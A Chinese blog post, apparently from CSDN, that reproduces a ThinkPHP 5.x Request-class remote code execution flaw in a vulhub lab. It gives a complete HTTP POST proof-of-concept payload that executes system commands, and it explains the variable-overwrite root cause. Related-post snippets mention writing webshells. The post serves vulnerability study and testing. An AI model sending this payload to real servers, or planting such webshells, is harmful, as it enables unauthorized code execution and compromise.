[漏洞复现]ThinkPHP5 核心类 Request 远程代码执行

最新推荐文章于 2024-10-09 16:04:59 发布
最新推荐文章于 2024-10-09 16:04:59 发布
阅读量556 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: thinkphp php 漏洞复现 rce 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/117075061
版权

ThinkPHP 5.x 核心类 Request 远程代码执行漏洞复现

影响版本:

ThinkPHP 5.0.x ~ 5.0.23

ThinkPHP 5.1.x ~ 5.1.31

ThinkPHP 5.2.0beta1

环境:

vulhub-master/thinkphp/5.0.23-rce

启动docker环境之后,访问:

http://ip:8080/

image-20210520140459654

POC:

POST /index.php?s=captcha HTTP/1.1
Host: 192.168.17.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

将get包转换为POST包,地址为/index.php?s=captcha,需添加s参数。

POST data为:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

将执行id命令。

image-20210520140947108

ls命令:

image-20210520141015360

写文件:
image-20210520141217579

成功访问:
image-20210520141232374

总结:

漏洞本质上是变量覆盖漏洞,在一处存在缺陷的方法中没有对用户输入做严格判断,通过传递_method参数覆盖了配置文件的_method,导致可以访问Request类的任意函数,而在Request的构造函数中又创建了恶意的成员变量,导致后面的命令执行

复现过程参考:

ThinkPHP 5.0.x-5.0.23、5.1.x、5.2.x 全版本远程代码执行漏洞分析 )

ThinkPHP5 核心类 Request 远程代码漏洞分析 (seebug.org)

wwxxee
关注
专栏目录
复现ThinkPHP5 5.0.23远程代码执行漏洞
NLXHBM的博客
04-15 448
搜索ThinkPHP5.0.23相关漏洞 2. 发现了 5.0.23Remote Code Execution(远程代码执行漏洞) 将该漏洞cp到tp.txt文件并查看 3.burpsuite进行抓包 4.执行命令 5. 写入phpinfo: `echo "<?php phpinfo(); ?>" > /var/www/public/phpinfo.php` 6.查看是否写入: 7.访问http://159.75.16.25:8...
复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
weixin_67813445的博客
03-15 712
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request任意方法并构造利用链,从而导致远程代码执行漏洞
ThinkPHP5.0.23 远程代码执行漏洞
夜星空如海的博客
09-30 1891
ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 任意方法并构造利用链,从而导致远程代码执行漏洞
代码审计-thinkphp 反序列化引起rce漏洞
最新发布
gj204106的博客
10-09 406
目前的pop链:__destruct()->removefile()->file_exists()->__toString()->toJson()->toArray()->__call()->call_user_func_array()由上图代码可知,要满足date为数组,filter = $this->getFilter($filter, $default),发现filterValue()方法在input()方法里面,所以再跟踪谁调用了input()方法。此漏洞需要成品有涉及到反序列化。
ThinkPHP5 5.0.23 远程代码执行漏洞
EC_Carrot的博客
08-17 388
漏洞简介 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request任意方法并构造利用链,从而导致远程代码执行漏洞漏洞复现 发送如下数据包即可执行id命令: POST /index.php?s=captcha HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: M
vulhub thinkphp5 5.0.23 远程代码执行漏洞
weixin_53696027的博客
03-15 805
vulhub thinkphp5 5.0.23 远程代码执行漏洞
复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
记录笔记
04-12 532
ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8089/index.php?s=captcha会出现如下报错 F12进入开发者 用HackBar 插件发送 POST 请求 得到回显: 通过echo命令写入 Webshell 文件 首先将一句话木马进行 Base64 编码 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
漏洞复现----38、ThinkPHP5 5.0.23 远程代码执行漏洞
七天
06-29 1702
ThinkPHP 5.0.23远程代码执行漏洞
ThinkPHP5 5.0.23-rce远程代码执行漏洞复现
A2893992091的博客
09-08 760
其版本5中,由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可执行任意方法,从而导致远程命令执行漏洞。通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码。判断是否存在漏洞:访问/index.php?s=captcha页面,会出现如下报错。切换目录到vulhub/thinkphp/5.0.23-rce下。使用HackBar 插件发送 POST 请求。端口为:8080,访问网站,搭建成功。访问shell.php,使用蚁剑连接。
网络安全深入学习第二课——热门框架漏洞RCEThinkphp5.0.23 代码执行
p36273的博客
09-16 1611
简言之,别人帮你建好了房子但尚未装修,你需要在别人设计好的户型里去装修,省去你搬砖的重复性操作。------ ThinkPHP发展至今,核心版本主要有以下几个系列,ThinkPHP 2系列、ThinkPHP 3系列、ThinkPHP 5系列、ThinkPHP 6系列,各个系列之间在代码实现及功能方面,有较大区别。其中ThinkPHP 2以及ThinkPHP 3系列已经停止维护,ThinkPHP 5系列现使用最多,而ThinkPHP 3系列也积累了较多的历史用户。
Thinkphp5.0.23远程代码执行漏洞复现
02-01 1808
Thinkphp5.0.23远程代码执行漏洞介绍、成因和复现
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-17 3450
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
【web攻防】ThinkPHP5.0.23 远程代码执行漏洞Thinkphp5.0.22/5.1.29远程代码执行漏洞 (Remote Code Execution)安鸾靶场练习
AAAAAAAAAAAA66的博客
12-30 2211
中华人民共和国网络安全法(出版物)_360百科中华人民共和国网络安全法,《中华人民共和国网络安全法》是为保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,促进经济社会信息化健康发展而制定的法律。《中华人民共和国网络安全法》由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,自2017年6月1日起施行。https://baike.so.com/doc/24210940-24838928.html 目录 靶场地址 Thi
eclipse的servlet默认不执行index_ThinkPHP 5.x 远程命令执行漏洞分析与复现
weixin_39934640的博客
11-25 116
0x00 前言ThinkPHP 官方 2018 年 12 月 9 日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的 getshell 漏洞,受影响的版本包括 5.0 和 5.1 版本,推荐尽快更新到最新版本。0x01 影响范围5.x < 5.1.31, <= 5.0.230x0...
ThinkPHP5.0.* Request远程代码执行漏洞分析
"这篇文档主要讨论的是ThinkPHP框架中的一个安全漏洞,具体是关于request函数的远程代码执行问题,涉及到的文件是library/think/Request.php的541至603行。此问题影响ThinkPHP 5.0.*版本。攻击者可以利用这个漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值